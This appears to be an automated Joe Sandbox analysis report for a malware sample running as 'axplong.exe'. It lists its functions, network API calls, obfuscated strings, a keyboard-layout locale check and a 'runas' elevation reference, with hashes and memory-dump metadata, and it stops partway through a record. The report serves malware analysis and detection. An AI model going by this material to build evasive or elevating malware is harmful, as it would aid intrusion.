Opcode ID: 1553b0c99cf114ebe404bff94ec2cf6bd4cdfe897329ec0f1fb8387aa1792452
Instruction ID: b00eb16f4732f33026b6697751851b0eccc5a9cfdd7af92568be2615fd2bd067
Opcode Fuzzy Hash: 1553b0c99cf114ebe404bff94ec2cf6bd4cdfe897329ec0f1fb8387aa1792452
Instruction Fuzzy Hash: D9F0AFB720E075EDA213A643AA14AB63B69E6D07307308816F4C7C9502F7E1F909FA31

Function 04DE0C7F Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2145926155.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4de0000_IRqsWvBBMc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef6fe13747081bb78028207c6bf0d39463d100b27a88e0055478319e7240a66
Instruction ID: 28cfb2a859e64f2095312de15a7c3dada0b1c8fd03a9221f1931de4aad9e2eef
Opcode Fuzzy Hash: 2ef6fe13747081bb78028207c6bf0d39463d100b27a88e0055478319e7240a66
Instruction Fuzzy Hash: 99F082FB74E031AD7142E5836A14ABB2A6DE0D17703318817F4C7C9101F6C0E90AF571

Function 04DE0CB0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2145926155.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4de0000_IRqsWvBBMc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad7b2c16b9ff0ec5fac82ecd8d0c29321dc460ffc35e62ef246c30aebc156e2
Instruction ID: 06053733ab0ad78dc448fa04680f85df134099e4543209e1dd621039bb870567
Opcode Fuzzy Hash: cad7b2c16b9ff0ec5fac82ecd8d0c29321dc460ffc35e62ef246c30aebc156e2
Instruction Fuzzy Hash: CEE01AEB24E039AD7152A0876B14AFB176EE0D5731371C817F886CA501F6C4AA4AF531

Analysis Process: axplong.exePID: 6432, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.4%
Total number of Nodes:	1936
Total number of Limit Nodes:	44

Executed Functions

Function 008FBD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00948D70,00000000,00000000,00000000,00000000), ref: 008FBDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008FBE11
HttpOpenRequestA.WININET(?,00000000), ref: 008FBE5B
HttpSendRequestA.WININET(?,00000000), ref: 008FBF1B
InternetReadFile.WININET(?,?,000003FF,?), ref: 008FBFCD
InternetCloseHandle.WININET(?), ref: 008FC0A7
InternetCloseHandle.WININET(?), ref: 008FC0AF
InternetCloseHandle.WININET(?), ref: 008FC0B7

Strings

8KG0fymoFx==, xrefs: 008FC2EB, 008FC543
RpKt, xrefs: 008FD516
invalid stoi argument, xrefs: 008FE404
8KG0fCKZFzY=, xrefs: 008FC385
RHYTYv==, xrefs: 008FBE33
stoi argument out of range, xrefs: 008FE3FA

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
API String ID: 688256393-332458646
Opcode ID: a8748f6308d48e11e98911fc3d917bc06943a9113868afd77e300bc5e02644ca
Instruction ID: 3a39b1a9e05043d502ebb40e42ea90e20825586afdf3d48e2e8c2683890b8eaf
Opcode Fuzzy Hash: a8748f6308d48e11e98911fc3d917bc06943a9113868afd77e300bc5e02644ca
Instruction Fuzzy Hash: 5BB1D4B1A1011C9BEB24CF28CD84BAEBBA5FF85314F5041A9F609D72C1DB719AC4CB95

Function 008FE440 Relevance: 14.8, Strings: 11, Instructions: 1000
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

246122658369, xrefs: 008FF647, 008FF924, 009004F7, 009008AA
#, xrefs: 00900534
WWt=, xrefs: 0090088D
WWp=, xrefs: 009004DA
MJB+, xrefs: 008FE734
WGt=, xrefs: 008FF62D, 008FF90A
UD==, xrefs: 008FEA1F, 008FEC66
GqKudSO2, xrefs: 008FE47F
111, xrefs: 008FF6B0
fed3aa, xrefs: 008FFA9E
MT==, xrefs: 008FE4A5

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
API String ID: 0-214772295
Opcode ID: 8a49713ba9cb907547dca723a72ac74c6f596330fe0140b2f7a53de897701e60
Instruction ID: 0eb7eb12bc63d220871cd4fa692f1263ee507134d4c6d1204ebd58c4c9a700ac
Opcode Fuzzy Hash: 8a49713ba9cb907547dca723a72ac74c6f596330fe0140b2f7a53de897701e60
Instruction Fuzzy Hash: 2C82D17090424C9FEF14EF68C9897DEBFB6EB46304F508198E905673C2C7759A88CB92

Function 008F65B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 008F6650

Strings

RBPleCSm, xrefs: 008F666C
GVQsgL==, xrefs: 008F66F8
IVKsgL==, xrefs: 008F67A1

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GVQsgL==$IVKsgL==$RBPleCSm
API String ID: 1484870144-3856690409
Opcode ID: ee2b1f26ebb9e123b162964cac4eed9553f2e278264571e47f0ecbfad5439628
Instruction ID: 0f5f58b5f360b3775d8026296ffaddd7aa82dff89c387bb250caa23a0307cead
Opcode Fuzzy Hash: ee2b1f26ebb9e123b162964cac4eed9553f2e278264571e47f0ecbfad5439628
Instruction Fuzzy Hash: 3291A4B190011C9BDB28DB74CC85BEDB779FB85314F4046E9E609D7281EA349B84CFA5

Function 0090D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 008F247E

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: d68ccd1783c33a997030b34c20ef025d0d789b842e3173905b9b771a318b3c7e
Instruction ID: 6b0cf0d843a03c3e8a9051ad0e613a714710099721a155eca6d026a0c82aba46
Opcode Fuzzy Hash: d68ccd1783c33a997030b34c20ef025d0d789b842e3173905b9b771a318b3c7e
Instruction Fuzzy Hash: 0551DFB2A167058FDB15CFA9E8917AEB7F8FB48310F24852AD805EB6D1D3349940CF50

Function 00903550 Relevance: 51.5, APIs: 1, Strings: 28, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0090425F

Part of subcall function 00907870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0090795C
Part of subcall function 00907870: __Cnd_destroy_in_situ.LIBCPMT ref: 00907968
Part of subcall function 00907870: __Mtx_destroy_in_situ.LIBCPMT ref: 00907971

Strings

aZT6, xrefs: 009053CC
5120, xrefs: 00903ABF, 00903BAA
mP=, xrefs: 00906383
8ZF6, xrefs: 00905502
WJP6, xrefs: 009053A3
WJms, xrefs: 00903BD9
MJB+, xrefs: 00904776, 009047ED, 00904A95, 00904B0C
Fz==, xrefs: 0090369E, 00904D2D
V0N6, xrefs: 0090537A
stoi argument out of range, xrefs: 00902E02, 00904269, 00904EAC
5F6, xrefs: 00905497
JB6, xrefs: 009053F5
MJF+, xrefs: 009047BD, 009048EC, 00904ADC, 00904C0B
V0x6, xrefs: 0090541E
invalid stoi argument, xrefs: 00902DE9, 00902DF8, 0090425A, 00904E9D
V5Qk, xrefs: 00903DC0
6F9fr==, xrefs: 00904712
9526, xrefs: 0090531D
fed3aa, xrefs: 00905489
9KN6, xrefs: 00905351
aqB6, xrefs: 009054DB
246122658369, xrefs: 00901EA5, 009027EE, 00902A43, 00902AB0, 00902E88, 00903373, 009033D4, 00904F3A, 00904F4D, 00904F8F, 00904F99, 009054F4
96B6, xrefs: 00905470
HBhr, xrefs: 0090378F
KFT0PL==, xrefs: 009054B9
", xrefs: 00903E99
W07l, xrefs: 00903AEE
Vp 6, xrefs: 00905447

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$"$246122658369$5120$8ZF6$9526$96B6$9KN6$Fz==$HBhr$KFT0PL==$MJB+$MJF+$V0N6$V0x6$V5Qk$Vp 6$W07l$WJP6$WJms$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-3875209911
Opcode ID: bb4068f529e7c97c55c2964f82b29b4247dcf602af1b7fa36407ae1396db9fa3
Instruction ID: 519eeed4ab00debc3ca2c8f3e5a3c663b1dc6e5e101ee78ada712440d82f6a26
Opcode Fuzzy Hash: bb4068f529e7c97c55c2964f82b29b4247dcf602af1b7fa36407ae1396db9fa3
Instruction Fuzzy Hash: FA520771E002489FEF18EF78CC4A79DBB75AF85314F508198E845A72C2D7359A84CBA2

Function 009046C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00907870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0090795C
Part of subcall function 00907870: __Cnd_destroy_in_situ.LIBCPMT ref: 00907968
Part of subcall function 00907870: __Mtx_destroy_in_situ.LIBCPMT ref: 00907971

Part of subcall function 008FBD60: InternetOpenW.WININET(00948D70,00000000,00000000,00000000,00000000), ref: 008FBDED
Part of subcall function 008FBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008FBE11
Part of subcall function 008FBD60: HttpOpenRequestA.WININET(?,00000000), ref: 008FBE5B

std::_Xinvalid_argument.LIBCPMT ref: 00904EA2

Strings

aZT6, xrefs: 009053CC
JB6, xrefs: 009053F5
mP=, xrefs: 00906383, 00906652
MJF+, xrefs: 009047BD, 009048EC, 00904ADC, 00904C0B
V0x6, xrefs: 0090541E
8ZF6, xrefs: 00905502
6F9fr==, xrefs: 00904712
WJP6, xrefs: 009053A3
9526, xrefs: 0090531D
fed3aa, xrefs: 00905489
9KN6, xrefs: 00905351
aqB6, xrefs: 009054DB
246122658369, xrefs: 00904F3A, 00904F4D, 00904F8F, 00904F99, 009054F4
96B6, xrefs: 00905470
KFT0PL==, xrefs: 009054B9
MJB+, xrefs: 00904776, 009047ED, 00904A95, 00904B0C
Vp 6, xrefs: 00905447
Fz==, xrefs: 0090369E, 00904D2D
V0N6, xrefs: 0090537A
stoi argument out of range, xrefs: 00904269, 00904EAC
5F6, xrefs: 00905497

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
API String ID: 2414744145-1662704651
Opcode ID: f1197821df65c83700499d72ff91a42fb39c71ab6cd5a03058503a1cff7ffe57
Instruction ID: 6e57351ea149bcb0c46d55713a33a6046d7c767de6d5b8f6a2853327d0b7c115
Opcode Fuzzy Hash: f1197821df65c83700499d72ff91a42fb39c71ab6cd5a03058503a1cff7ffe57
Instruction Fuzzy Hash: 7A232371E002589FEB19DB28CD8979DBB76AB81304F5081D8E449AB2C6EB359FC4CF51

Function 008F5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 008F600A
00000422, xrefs: 008F5FD9
00000419, xrefs: 008F5FA8
0000043f, xrefs: 008F603B
Keyboard Layout\Preload, xrefs: 008F5F64

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: c9f636cf31f7a86b306e39ceb0166937157aba83342706bef1867a71950b3fce
Instruction ID: 915720c72e866bf7c84ab880cc8b556dc724fa380682449958b36caa7ac9509d
Opcode Fuzzy Hash: c9f636cf31f7a86b306e39ceb0166937157aba83342706bef1867a71950b3fce
Instruction Fuzzy Hash: 99E18E7190121CAFEB24DFA4CC89BEEB779EB44304F5042D9E508A7291EB74ABC48F51

Function 008F7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008F7EA3

Strings

JmpxQb==, xrefs: 008F81B2
JmpxRL==, xrefs: 008F8062
JmpyPb==, xrefs: 008F810A

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: edfc09b31200186f25ba2209c321b9efc6fa6809b0d167bcaa6731c8531e742c
Instruction ID: 0d814104a1513db6d8664fe26d07c8db42fb1d318fdc739aa5b6e66c02c1fd54
Opcode Fuzzy Hash: edfc09b31200186f25ba2209c321b9efc6fa6809b0d167bcaa6731c8531e742c
Instruction Fuzzy Hash: B3D1E871E0460CDBDB14EB78CD563AD7B61FB82324F904298E915A73C2DB359E8487D2

Function 008F7400 Relevance: 4.8, APIs: 3, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runas, xrefs: 008F72D3

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitExecuteMtx_destroy_in_situShell
String ID: runas
API String ID: 1191624902-4000483414
Opcode ID: 72e64e92759f6a807542ee619e04adf53a62b2e82893d986f2db3659f4fa01c9
Instruction ID: e4a089486978efb7a07c71e8c5b26c846e74c2eaae18ae3d46042682d0770e99
Opcode Fuzzy Hash: 72e64e92759f6a807542ee619e04adf53a62b2e82893d986f2db3659f4fa01c9
Instruction Fuzzy Hash: 29A1337062524C9FEB08DF78CC86BADBBA5EB89314F504219F901E73D5DB35A980CB91

Function 00926E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00926E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00926E7D
__dosmaperr.LIBCMT ref: 00926F12

Part of subcall function 00927177: __dosmaperr.LIBCMT ref: 009271AC

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 3353a7e79f846b844297df7447d29d2b57c6084159eaba0abd178fea355a65e9
Instruction ID: 87d8142807b75cfad9d8d56e50eacca2bbf342faaa85facac84ecf3ec95d7e61
